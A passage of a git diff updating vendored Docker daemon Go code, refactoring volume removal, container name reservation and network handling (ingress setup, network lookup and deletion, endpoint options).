container.ID) - if rm { - // Do not remove named mountpoints - // these are mountpoints specified like `docker run -v :/foo` - if m.Spec.Source != "" { - continue - } - err := daemon.volumes.Remove(m.Volume) - // Ignore volume in use errors because having this - // volume being referenced by other container is - // not an error, but an implementation detail. - // This prevents docker from logging "ERROR: Volume in use" - // where there is another container using the volume. - if err != nil && !volumestore.IsInUse(err) { - rmErrors = append(rmErrors, err.Error()) - } + daemon.volumes.Release(ctx, m.Volume.Name(), container.ID) + if !rm { + continue + } + + // Do not remove named mountpoints + // these are mountpoints specified like `docker run -v :/foo` + if m.Spec.Source != "" { + continue + } + + err := daemon.volumes.Remove(ctx, m.Volume.Name()) + // Ignore volume in use errors because having this + // volume being referenced by other container is + // not an error, but an implementation detail. + // This prevents docker from logging "ERROR: Volume in use" + // where there is another container using the volume. + if err != nil && !volumesservice.IsInUse(err) { + rmErrors = append(rmErrors, err.Error()) } } + if len(rmErrors) > 0 { return fmt.Errorf("Error removing volumes:\n%v", strings.Join(rmErrors, "\n")) } diff --git a/vendor/github.com/docker/docker/daemon/names.go b/vendor/github.com/docker/docker/daemon/names.go index 273d551513..6c31949777 100644 --- a/vendor/github.com/docker/docker/daemon/names.go +++ b/vendor/github.com/docker/docker/daemon/names.go @@ -1,20 +1,21 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/container" + "github.com/docker/docker/daemon/names" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/namesgenerator" - "github.com/docker/docker/pkg/registrar" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/utils" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( - validContainerNameChars = utils.RestrictedNameChars - validContainerNamePattern = utils.RestrictedNamePattern + validContainerNameChars = names.RestrictedNameChars + validContainerNamePattern = names.RestrictedNamePattern ) func (daemon *Daemon) registerName(container *container.Container) error { @@ -30,12 +31,8 @@ func (daemon *Daemon) registerName(container *container.Container) error { return err } container.Name = name - - if err := container.ToDiskLocking(); err != nil { - logrus.Errorf("Error saving container name to disk: %v", err) - } } - return daemon.nameIndex.Reserve(container.Name, container.ID) + return daemon.containersReplica.ReserveName(container.Name, container.ID) } func (daemon *Daemon) generateIDAndName(name string) (string, string, error) { @@ -60,28 +57,28 @@ func (daemon *Daemon) generateIDAndName(name string) (string, string, error) { func (daemon *Daemon) reserveName(id, name string) (string, error) { if !validContainerNamePattern.MatchString(strings.TrimPrefix(name, "/")) { - return "", fmt.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars) + return "", errdefs.InvalidParameter(errors.Errorf("Invalid container name (%s), only %s are allowed", name, validContainerNameChars)) } if name[0] != '/' { name = "/" + name } - if err := daemon.nameIndex.Reserve(name, id); err != nil { - if err == registrar.ErrNameReserved { - id, err := daemon.nameIndex.Get(name) + if err := daemon.containersReplica.ReserveName(name, id); err != nil { + if err == container.ErrNameReserved { + id, err := daemon.containersReplica.Snapshot().GetID(name) if err != nil { logrus.Errorf("got unexpected error while looking up reserved name: %v", err) return "", err } - return "", fmt.Errorf("Conflict. The container name %q is already in use by container %s. You have to remove (or rename) that container to be able to reuse that name.", name, id) + return "", nameConflictError{id: id, name: name} } - return "", fmt.Errorf("error reserving name: %s, error: %v", name, err) + return "", errors.Wrapf(err, "error reserving name: %q", name) } return name, nil } func (daemon *Daemon) releaseName(name string) { - daemon.nameIndex.Release(name) + daemon.containersReplica.ReleaseName(name) } func (daemon *Daemon) generateNewName(id string) (string, error) { @@ -92,8 +89,8 @@ func (daemon *Daemon) generateNewName(id string) (string, error) { name = "/" + name } - if err := daemon.nameIndex.Reserve(name, id); err != nil { - if err == registrar.ErrNameReserved { + if err := daemon.containersReplica.ReserveName(name, id); err != nil { + if err == container.ErrNameReserved { continue } return "", err @@ -102,7 +99,7 @@ func (daemon *Daemon) generateNewName(id string) (string, error) { } name = "/" + stringid.TruncateID(id) - if err := daemon.nameIndex.Reserve(name, id); err != nil { + if err := daemon.containersReplica.ReserveName(name, id); err != nil { return "", err } return name, nil diff --git a/vendor/github.com/docker/docker/utils/names.go b/vendor/github.com/docker/docker/daemon/names/names.go similarity index 86% rename from vendor/github.com/docker/docker/utils/names.go rename to vendor/github.com/docker/docker/daemon/names/names.go index 632062819c..22bba53d69 100644 --- a/vendor/github.com/docker/docker/utils/names.go +++ b/vendor/github.com/docker/docker/daemon/names/names.go @@ -1,4 +1,4 @@ -package utils +package names // import "github.com/docker/docker/daemon/names" import "regexp" diff --git a/vendor/github.com/docker/docker/daemon/network.go b/vendor/github.com/docker/docker/daemon/network.go index ab8fd88da8..4263409be8 100644 --- a/vendor/github.com/docker/docker/daemon/network.go +++ b/vendor/github.com/docker/docker/daemon/network.go @@ -1,66 +1,97 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "net" "runtime" "sort" + "strconv" "strings" + "sync" - "github.com/Sirupsen/logrus" - apierrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" clustertypes "github.com/docker/docker/daemon/cluster/provider" + internalnetwork "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/opts" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" "github.com/docker/libnetwork" + lncluster "github.com/docker/libnetwork/cluster" "github.com/docker/libnetwork/driverapi" "github.com/docker/libnetwork/ipamapi" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" networktypes "github.com/docker/libnetwork/types" "github.com/pkg/errors" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) +// PredefinedNetworkError is returned when user tries to create predefined network that already exists. +type PredefinedNetworkError string + +func (pnr PredefinedNetworkError) Error() string { + return fmt.Sprintf("operation is not permitted on predefined %s network ", string(pnr)) +} + +// Forbidden denotes the type of this error +func (pnr PredefinedNetworkError) Forbidden() {} + // NetworkControllerEnabled checks if the networking stack is enabled. // This feature depends on OS primitives and it's disabled in systems like Windows. func (daemon *Daemon) NetworkControllerEnabled() bool { return daemon.netController != nil } -// FindNetwork function finds a network for a given string that can represent network name or id -func (daemon *Daemon) FindNetwork(idName string) (libnetwork.Network, error) { - // Find by Name - n, err := daemon.GetNetworkByName(idName) - if err != nil && !isNoSuchNetworkError(err) { - return nil, err - } - - if n != nil { - return n, nil +// FindNetwork returns a network based on: +// 1. Full ID +// 2. Full Name +// 3. Partial ID +// as long as there is no ambiguity +func (daemon *Daemon) FindNetwork(term string) (libnetwork.Network, error) { + listByFullName := []libnetwork.Network{} + listByPartialID := []libnetwork.Network{} + for _, nw := range daemon.getAllNetworks() { + if nw.ID() == term { + return nw, nil + } + if nw.Name() == term { + listByFullName = append(listByFullName, nw) + } + if strings.HasPrefix(nw.ID(), term) { + listByPartialID = append(listByPartialID, nw) + } } - - // Find by id - return daemon.GetNetworkByID(idName) + switch { + case len(listByFullName) == 1: + return listByFullName[0], nil + case len(listByFullName) > 1: + return nil, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found on name)", term, len(listByFullName))) + case len(listByPartialID) == 1: + return listByPartialID[0], nil + case len(listByPartialID) > 1: + return nil, errdefs.InvalidParameter(errors.Errorf("network %s is ambiguous (%d matches found based on ID prefix)", term, len(listByPartialID))) + } + + // Be very careful to change the error type here, the + // libnetwork.ErrNoSuchNetwork error is used by the controller + // to retry the creation of the network as managed through the swarm manager + return nil, errdefs.NotFound(libnetwork.ErrNoSuchNetwork(term)) } -func isNoSuchNetworkError(err error) bool { - _, ok := err.(libnetwork.ErrNoSuchNetwork) - return ok -} - -// GetNetworkByID function returns a network whose ID begins with the given prefix. -// It fails with an error if no matching, or more than one matching, networks are found. -func (daemon *Daemon) GetNetworkByID(partialID string) (libnetwork.Network, error) { - list := daemon.GetNetworksByID(partialID) - - if len(list) == 0 { - return nil, libnetwork.ErrNoSuchNetwork(partialID) - } - if len(list) > 1 { - return nil, libnetwork.ErrInvalidID(partialID) +// GetNetworkByID function returns a network whose ID matches the given ID. +// It fails with an error if no matching network is found. +func (daemon *Daemon) GetNetworkByID(id string) (libnetwork.Network, error) { + c := daemon.netController + if c == nil { + return nil, libnetwork.ErrNoSuchNetwork(id) } - return list[0], nil + return c.NetworkByID(id) } // GetNetworkByName function returns a network for a given network name. @@ -76,8 +107,8 @@ func (daemon *Daemon) GetNetworkByName(name string) (libnetwork.Network, error) return c.NetworkByName(name) } -// GetNetworksByID returns a list of networks whose ID partially matches zero or more networks -func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network { +// GetNetworksByIDPrefix returns a list of networks whose ID partially matches zero or more networks +func (daemon *Daemon) GetNetworksByIDPrefix(partialID string) []libnetwork.Network { c := daemon.netController if c == nil { return nil @@ -97,104 +128,124 @@ func (daemon *Daemon) GetNetworksByID(partialID string) []libnetwork.Network { // getAllNetworks returns a list containing all networks func (daemon *Daemon) getAllNetworks() []libnetwork.Network { c := daemon.netController - list := []libnetwork.Network{} - l := func(nw libnetwork.Network) bool { - list = append(list, nw) - return false + if c == nil { + return nil } - c.WalkNetworks(l) - - return list + return c.Networks() } -func isIngressNetwork(name string) bool { - return name == "ingress" +type ingressJob struct { + create *clustertypes.NetworkCreateRequest + ip net.IP + jobDone chan struct{} } -var ingressChan = make(chan struct{}, 1) +var ( + ingressWorkerOnce sync.Once + ingressJobsChannel chan *ingressJob + ingressID string +) -func ingressWait() func() { - ingressChan <- struct{}{} - return func() { <-ingressChan } +func (daemon *Daemon) startIngressWorker() { + ingressJobsChannel = make(chan *ingressJob, 100) + go func() { + // nolint: gosimple + for { + select { + case r := <-ingressJobsChannel: + if r.create != nil { + daemon.setupIngress(r.create, r.ip, ingressID) + ingressID = r.create.ID + } else { + daemon.releaseIngress(ingressID) + ingressID = "" + } + close(r.jobDone) + } + } + }() +} + +// enqueueIngressJob adds a ingress add/rm request to the worker queue. +// It guarantees the worker is started. +func (daemon *Daemon) enqueueIngressJob(job *ingressJob) { + ingressWorkerOnce.Do(daemon.startIngressWorker) + ingressJobsChannel <- job } // SetupIngress setups ingress networking. -func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) error { +// The function returns a channel which will signal the caller when the programming is completed. +func (daemon *Daemon) SetupIngress(create clustertypes.NetworkCreateRequest, nodeIP string) (<-chan struct{}, error) { ip, _, err := net.ParseCIDR(nodeIP) if err != nil { - return err + return nil, err } + done := make(chan struct{}) + daemon.enqueueIngressJob(&ingressJob{&create, ip, done}) + return done, nil +} - go func() { - controller := daemon.netController - controller.AgentInitWait() - - if n, err := daemon.GetNetworkByName(create.Name); err == nil && n != nil && n.ID() != create.ID { - if err := controller.SandboxDestroy("ingress-sbox"); err != nil { - logrus.Errorf("Failed to delete stale ingress sandbox: %v", err) - return - } - - // Cleanup any stale endpoints that might be left over during previous iterations - epList := n.Endpoints() - for _, ep := range epList { - if err := ep.Delete(true); err != nil { - logrus.Errorf("Failed to delete endpoint %s (%s): %v", ep.Name(), ep.ID(), err) - } - } - - if err := n.Delete(); err != nil { - logrus.Errorf("Failed to delete stale ingress network %s: %v", n.ID(), err) - return - } - } +// ReleaseIngress releases the ingress networking. +// The function returns a channel which will signal the caller when the programming is completed. +func (daemon *Daemon) ReleaseIngress() (<-chan struct{}, error) { + done := make(chan struct{}) + daemon.enqueueIngressJob(&ingressJob{nil, nil, done}) + return done, nil +} - if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil { - // If it is any other error other than already - // exists error log error and return. - if _, ok := err.(libnetwork.NetworkNameError); !ok { - logrus.Errorf("Failed creating ingress network: %v", err) - return - } +func (daemon *Daemon) setupIngress(create *clustertypes.NetworkCreateRequest, ip net.IP, staleID string) { + controller := daemon.netController + controller.AgentInitWait() - // Otherwise continue down the call to create or recreate sandbox. - } + if staleID != "" && staleID != create.ID { + daemon.releaseIngress(staleID) + } - n, err := daemon.GetNetworkByID(create.ID) - if err != nil { - logrus.Errorf("Failed getting ingress network by id after creating: %v", err) + if _, err := daemon.createNetwork(create.NetworkCreateRequest, create.ID, true); err != nil { + // If it is any other error other than already + // exists error log error and return. + if _, ok := err.(libnetwork.NetworkNameError); !ok { + logrus.Errorf("Failed creating ingress network: %v", err) return } + // Otherwise continue down the call to create or recreate sandbox. + } - sb, err := controller.NewSandbox("ingress-sbox", libnetwork.OptionIngress()) - if err != nil { - if _, ok := err.(networktypes.ForbiddenError); !ok { - logrus.Errorf("Failed creating ingress sandbox: %v", err) - } - return - } + _, err := daemon.GetNetworkByID(create.ID) + if err != nil { + logrus.Errorf("Failed getting ingress network by id after creating: %v", err) + } +} - ep, err := n.CreateEndpoint("ingress-endpoint", libnetwork.CreateOptionIpam(ip, nil, nil, nil)) - if err != nil { - logrus.Errorf("Failed creating ingress endpoint: %v", err) - return - } +func (daemon *Daemon) releaseIngress(id string) { + controller := daemon.netController - if err := ep.Join(sb, nil); err != nil { - logrus.Errorf("Failed joining ingress sandbox to ingress endpoint: %v", err) - } + if id == "" { + return + } - if err := sb.EnableService(); err != nil { - logrus.WithError(err).Error("Failed enabling service for ingress sandbox") - } - }() + n, err := controller.NetworkByID(id) + if err != nil { + logrus.Errorf("failed to retrieve ingress network %s: %v", id, err) + return + } - return nil + daemon.deleteLoadBalancerSandbox(n) + + if err := n.Delete(); err != nil { + logrus.Errorf("Failed to delete ingress network %s: %v", n.ID(), err) + return + } } // SetNetworkBootstrapKeys sets the bootstrap keys. func (daemon *Daemon) SetNetworkBootstrapKeys(keys []*networktypes.EncryptionKey) error { - return daemon.netController.SetKeys(keys) + err := daemon.netController.SetKeys(keys) + if err == nil { + // Upon successful key setting dispatch the keys available event + daemon.cluster.SendClusterEvent(lncluster.EventNetworkKeysAvailable) + } + return err } // UpdateAttachment notifies the attacher about the attachment config. @@ -236,16 +287,8 @@ func (daemon *Daemon) CreateNetwork(create types.NetworkCreateRequest) (*types.N } func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string, agent bool) (*types.NetworkCreateResponse, error) { - // If there is a pending ingress network creation wait here - // since ingress network creation can happen via node download - // from manager or task download. - if isIngressNetwork(create.Name) { - defer ingressWait()() - } - - if runconfig.IsPreDefinedNetwork(create.Name) && !agent { - err := fmt.Errorf("%s is a pre-defined network and cannot be created", create.Name) - return nil, apierrors.NewRequestForbiddenError(err) + if runconfig.IsPreDefinedNetwork(create.Name) { + return nil, PredefinedNetworkError(create.Name) } var warning string @@ -256,8 +299,12 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string } } if nw != nil { + // check if user defined CheckDuplicate, if set true, return err + // otherwise prepare a warning message if create.CheckDuplicate { - return nil, libnetwork.NetworkNameError(create.Name) + if !agent || nw.Info().Dynamic() { + return nil, libnetwork.NetworkNameError(create.Name) + } } warning = fmt.Sprintf("Network with name %s (id : %s) already exists", nw.Name(), nw.ID()) } @@ -273,6 +320,12 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string libnetwork.NetworkOptionDriverOpts(create.Options), libnetwork.NetworkOptionLabels(create.Labels), libnetwork.NetworkOptionAttachable(create.Attachable), + libnetwork.NetworkOptionIngress(create.Ingress), + libnetwork.NetworkOptionScope(create.Scope), + } + + if create.ConfigOnly { + nwOptions = append(nwOptions, libnetwork.NetworkOptionConfigOnly()) } if create.IPAM != nil { @@ -292,18 +345,31 @@ func (daemon *Daemon) createNetwork(create types.NetworkCreateRequest, id string nwOptions = append(nwOptions, libnetwork.NetworkOptionPersist(false)) } - if isIngressNetwork(create.Name) { - nwOptions = append(nwOptions, libnetwork.NetworkOptionIngress()) + if create.ConfigFrom != nil { + nwOptions = append(nwOptions, libnetwork.NetworkOptionConfigFrom(create.ConfigFrom.Network)) + } + + if agent && driver == "overlay" && (create.Ingress || runtime.GOOS == "windows") { + nodeIP, exists := daemon.GetAttachmentStore().GetIPForNetwork(id) + if !exists { + return nil, fmt.Errorf("Failed to find a load balancer IP to use for network: %v", id) + } + + nwOptions = append(nwOptions, libnetwork.NetworkOptionLBEndpoint(nodeIP)) } n, err := c.NewNetwork(driver, create.Name, id, nwOptions...) if err != nil { + if _, ok := err.(libnetwork.ErrDataStoreNotInitialized); ok { + // nolint: golint + return nil, errors.New("This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") + } return nil, err } - daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.ACQUIRE) + daemon.pluginRefCount(driver, driverapi.NetworkPluginEndpointType, plugingetter.Acquire) if create.IPAM != nil { - daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.ACQUIRE) + daemon.pluginRefCount(create.IPAM.Driver, ipamapi.PluginEndpointType, plugingetter.Acquire) } daemon.LogNetworkEvent(n, "create") @@ -373,9 +439,6 @@ func (daemon *Daemon) UpdateContainerServiceConfig(containerName string, service // network. If either cannot be found, an err is returned. If the // network cannot be set up, an err is returned. func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error { - if runtime.GOOS == "solaris" { - return errors.New("docker network connect is unsupported on Solaris platform") - } container, err := daemon.GetContainer(containerName) if err != nil { return err @@ -386,9 +449,6 @@ func (daemon *Daemon) ConnectContainerToNetwork(containerName, networkName strin // DisconnectContainerFromNetwork disconnects the given container from // the given network. If either cannot be found, an err is returned. func (daemon *Daemon) DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error { - if runtime.GOOS == "solaris" { - return errors.New("docker network disconnect is unsupported on Solaris platform") - } container, err := daemon.GetContainer(containerName) if err != nil { if force { @@ -434,33 +494,84 @@ func (daemon *Daemon) GetNetworkDriverList() []string { } // DeleteManagedNetwork deletes an agent network. +// The requirement of networkID is enforced. func (daemon *Daemon) DeleteManagedNetwork(networkID string) error { - return daemon.deleteNetwork(networkID, true) + n, err := daemon.GetNetworkByID(networkID) + if err != nil { + return err + } + return daemon.deleteNetwork(n, true) } // DeleteNetwork destroys a network unless it's one of docker's predefined networks. func (daemon *Daemon) DeleteNetwork(networkID string) error { - return daemon.deleteNetwork(networkID, false) -} - -func (daemon *Daemon) deleteNetwork(networkID string, dynamic bool) error { - nw, err := daemon.FindNetwork(networkID) + n, err := daemon.GetNetworkByID(networkID) if err != nil { return err } + return daemon.deleteNetwork(n, false) +} +func (daemon *Daemon) deleteLoadBalancerSandbox(n libnetwork.Network) { + controller := daemon.netController + + //The only endpoint left should be the LB endpoint (nw.Name() + "-endpoint") + endpoints := n.Endpoints() + if len(endpoints) == 1 { + sandboxName := n.Name() + "-sbox" + + info := endpoints[0].Info() + if info != nil { + sb := info.Sandbox() + if sb != nil { + if err := sb.DisableService(); err != nil { + logrus.Warnf("Failed to disable service on sandbox %s: %v", sandboxName, err) + //Ignore error and attempt to delete the load balancer endpoint + } + } + } + + if err := endpoints[0].Delete(true); err != nil { + logrus.Warnf("Failed to delete endpoint %s (%s) in %s: %v", endpoints[0].Name(), endpoints[0].ID(), sandboxName, err) + //Ignore error and attempt to delete the sandbox. + } + + if err := controller.SandboxDestroy(sandboxName); err != nil { + logrus.Warnf("Failed to delete %s sandbox: %v", sandboxName, err) + //Ignore error and attempt to delete the network. + } + } +} + +func (daemon *Daemon) deleteNetwork(nw libnetwork.Network, dynamic bool) error { if runconfig.IsPreDefinedNetwork(nw.Name()) && !dynamic { err := fmt.Errorf("%s is a pre-defined network and cannot be removed", nw.Name()) - return apierrors.NewRequestForbiddenError(err) + return errdefs.Forbidden(err) + } + + if dynamic && !nw.Info().Dynamic() { + if runconfig.IsPreDefinedNetwork(nw.Name()) { + // Predefined networks now support swarm services. Make this + // a no-op when cluster requests to remove the predefined network. + return nil + } + err := fmt.Errorf("%s is not a dynamic network", nw.Name()) + return errdefs.Forbidden(err) } if err := nw.Delete(); err != nil { return err } - daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.RELEASE) - ipamType, _, _, _ := nw.Info().IpamConfig() - daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.RELEASE) - daemon.LogNetworkEvent(nw, "destroy") + + // If this is not a configuration only network, we need to + // update the corresponding remote drivers' reference counts + if !nw.Info().ConfigOnly() { + daemon.pluginRefCount(nw.Type(), driverapi.NetworkPluginEndpointType, plugingetter.Release) + ipamType, _, _, _ := nw.Info().IpamConfig() + daemon.pluginRefCount(ipamType, ipamapi.PluginEndpointType, plugingetter.Release) + daemon.LogNetworkEvent(nw, "destroy") + } + return nil } @@ -472,7 +583,7 @@ func (daemon *Daemon) GetNetworks() []libnetwork.Network { // clearAttachableNetworks removes the attachable networks // after disconnecting any connected container func (daemon *Daemon) clearAttachableNetworks() { - for _, n := range daemon.GetNetworks() { + for _, n := range daemon.getAllNetworks() { if !n.Info().Attachable() { continue } @@ -496,3 +607,312 @@ func (daemon *Daemon) clearAttachableNetworks() { } } } + +// buildCreateEndpointOptions builds endpoint options from a given network. +func buildCreateEndpointOptions(c *container.Container, n libnetwork.Network, epConfig *network.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) { + var ( + bindings = make(nat.PortMap) + pbList []networktypes.PortBinding + exposeList []networktypes.TransportPort + createOptions []libnetwork.EndpointOption + ) + + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + + if (!c.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) || + c.NetworkSettings.IsAnonymousEndpoint { + createOptions = append(createOptions, libnetwork.CreateOptionAnonymous()) + } + + if epConfig != nil { + ipam := epConfig.IPAMConfig + + if ipam != nil { + var ( + ipList []net.IP + ip, ip6, linkip net.IP + ) + + for _, ips := range ipam.LinkLocalIPs { + if linkip = net.ParseIP(ips); linkip == nil && ips != "" { + return nil, errors.Errorf("Invalid link-local IP address: %s", ipam.LinkLocalIPs) + } + ipList = append(ipList, linkip) + + } + + if ip = net.ParseIP(ipam.IPv4Address); ip == nil && ipam.IPv4Address != "" { + return nil, errors.Errorf("Invalid IPv4 address: %s)", ipam.IPv4Address) + } + + if ip6 = net.ParseIP(ipam.IPv6Address); ip6 == nil && ipam.IPv6Address != "" { + return nil, errors.Errorf("Invalid IPv6 address: %s)", ipam.IPv6Address) + } + + createOptions = append(createOptions, + libnetwork.CreateOptionIpam(ip, ip6, ipList, nil)) + + } + + for _, alias := range epConfig.Aliases { + createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias)) + } + for k, v := range epConfig.DriverOpts { + createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(options.Generic{k: v})) + } + } + + if c.NetworkSettings.Service != nil { + svcCfg := c.NetworkSettings.Service + + var vip string + if svcCfg.VirtualAddresses[n.ID()] != nil { + vip = svcCfg.VirtualAddresses[n.ID()].IPv4 + } + + var portConfigs []*libnetwork.PortConfig + for _, portConfig := range svcCfg.ExposedPorts { + portConfigs = append(portConfigs, &libnetwork.PortConfig{ + Name: portConfig.Name, + Protocol: libnetwork.PortConfig_Protocol(portConfig.Protocol), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + }) + } + + createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()])) + } + + if !containertypes.NetworkMode(n.Name()).IsUserDefined() { + createOptions = append(createOptions, libnetwork.CreateOptionDisableResolution()) + } + + // configs that are applicable only for the endpoint in the network + // to which container was connected to on docker run. + // Ideally all these network-specific endpoint configurations must be moved under + // container.NetworkSettings.Networks[n.Name()] + if n.Name() == c.HostConfig.NetworkMode.NetworkName() || + (n.Name() == defaultNetName && c.HostConfig.NetworkMode.IsDefault()) { + if c.Config.MacAddress != "" { + mac, err := net.ParseMAC(c.Config.MacAddress) + if err != nil { + return nil, err + } + + genericOption := options.Generic{ + netlabel.MacAddress: mac, + } + + createOptions = append(createOptions, libnetwork.EndpointOptionGeneric(genericOption)) + } + + } + + // Port-mapping rules belong to the container & applicable only to non-internal networks + portmaps := getSandboxPortMapInfo(sb) + if n.Info().Internal() || len(portmaps) > 0 { + return createOptions, nil + } + + if c.HostConfig.PortBindings != nil { + for p, b := range c.HostConfig.PortBindings { + bindings[p] = []nat.PortBinding{} + for _, bb := range b { + bindings[p] = append(bindings[p], nat.PortBinding{ + HostIP: bb.HostIP, + HostPort: bb.HostPort, + }) + } + } + } + + portSpecs := c.Config.ExposedPorts + ports := make([]nat.Port, len(portSpecs)) + var i int + for p := range portSpecs { + ports[i] = p + i++ + } + nat.SortPortMap(ports, bindings) + for _, port := range ports { + expose := networktypes.TransportPort{} + expose.Proto = networktypes.ParseProtocol(port.Proto()) + expose.Port = uint16(port.Int()) + exposeList = append(exposeList, expose) + + pb := networktypes.PortBinding{Port: expose.Port, Proto: expose.Proto} + binding := bindings[port] + for i := 0; i < len(binding); i++ { + pbCopy := pb.GetCopy() + newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) + var portStart, portEnd int + if err == nil { + portStart, portEnd, err = newP.Range() + } + if err != nil { + return nil, errors.Wrapf(err, "Error parsing HostPort value (%s)", binding[i].HostPort) + } + pbCopy.HostPort = uint16(portStart) + pbCopy.HostPortEnd = uint16(portEnd) + pbCopy.HostIP = net.ParseIP(binding[i].HostIP) + pbList = append(pbList, pbCopy) + } + + if c.HostConfig.PublishAllPorts && len(binding) == 0 { + pbList = append(pbList, pb) + } + } + + var dns []string + + if len(c.HostConfig.DNS) > 0 { + dns = c.HostConfig.DNS + } else if len(daemonDNS) > 0 { + dns = daemonDNS + } + + if len(dns) > 0 { + createOptions = append(createOptions, + libnetwork.CreateOptionDNS(dns)) + } + + createOptions = append(createOptions, + libnetwork.CreateOptionPortMapping(pbList), + libnetwork.CreateOptionExposedPorts(exposeList)) + + return createOptions, nil +} + +// getEndpointInNetwork returns the container's endpoint to the provided network. +func getEndpointInNetwork(name string, n libnetwork.Network) (libnetwork.Endpoint, error) { + endpointName := strings.TrimPrefix(name, "/") + return n.EndpointByName(endpointName) +} + +// getSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox +func getSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap { + pm := nat.PortMap{} + if sb == nil { + return pm + } + + for _, ep := range sb.Endpoints() { + pm, _ = getEndpointPortMapInfo(ep) + if len(pm) > 0 { + break + } + } + return pm +} + +func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) { + pm := nat.PortMap{} + driverInfo, err := ep.DriverInfo() + if err != nil { + return pm, err + } + + if driverInfo == nil { + // It is not an error for epInfo to be nil + return pm, nil + } + + if expData, ok := driverInfo[netlabel.ExposedPorts]; ok { + if exposedPorts, ok := expData.([]networktypes.TransportPort); ok { + for _, tp := range exposedPorts { + natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port))) + if err != nil { + return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err) + } + pm[natPort] = nil + } + } + } + + mapData, ok := driverInfo[netlabel.PortMap] + if !ok { + return pm, nil + } + + if portMapping, ok := mapData.([]networktypes.PortBinding); ok { + for _, pp := range portMapping { + natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port))) + if err != nil { + return pm, err + } + natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))} + pm[natPort] = append(pm[natPort], natBndg) + } + } + + return pm, nil +} + +// buildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint. +func buildEndpointInfo(networkSettings *internalnetwork.Settings, n libnetwork.Network, ep libnetwork.Endpoint) error { + if ep == nil { + return errors.New("endpoint cannot be nil") + } + + if networkSettings == nil { + return errors.New("network cannot be nil") + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + + if _, ok := networkSettings.Networks[n.Name()]; !ok { + networkSettings.Networks[n.Name()] = &internalnetwork.EndpointSettings{ + EndpointSettings: &network.EndpointSettings{}, + } + } + networkSettings.Networks[n.Name()].NetworkID = n.ID() + networkSettings.Networks[n.Name()].EndpointID = ep.ID() + + iface := epInfo.Iface() + if iface == nil { + return nil + } + + if iface.MacAddress() != nil { + networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String() + } + + if iface.Address() != nil { + ones, _ := iface.Address().Mask.Size() + networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String() + networkSettings.Networks[n.Name()].IPPrefixLen = ones + } + + if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil { + onesv6, _ := iface.AddressIPv6().Mask.Size() + networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String() + networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6 + } + + return nil +} + +// buildJoinOptions builds endpoint Join options from a given network. +func buildJoinOptions(networkSettings *internalnetwork.Settings, n interface { + Name() string +}) ([]libnetwork.EndpointOption, error) { + var joinOptions []libnetwork.EndpointOption + if epConfig, ok := networkSettings.Networks[n.Name()]; ok { + for _, str := range epConfig.Links { + name, alias, err := opts.ParseLink(str) + if err != nil { + return nil, err + } + joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias)) + } + for k, v := range epConfig.DriverOpts { + joinOptions = append(joinOptions, libnetwork.EndpointOptionGeneric(options.Generic{k: v})) + } + } + + return joinOptions, nil +} diff --git a/vendor/github.com/docker/docker/daemon/network/settings.go b/vendor/github.com/docker/docker/daemon/network/settings.go index 8f6b7dd59e..b0460ed6ae 100644 --- 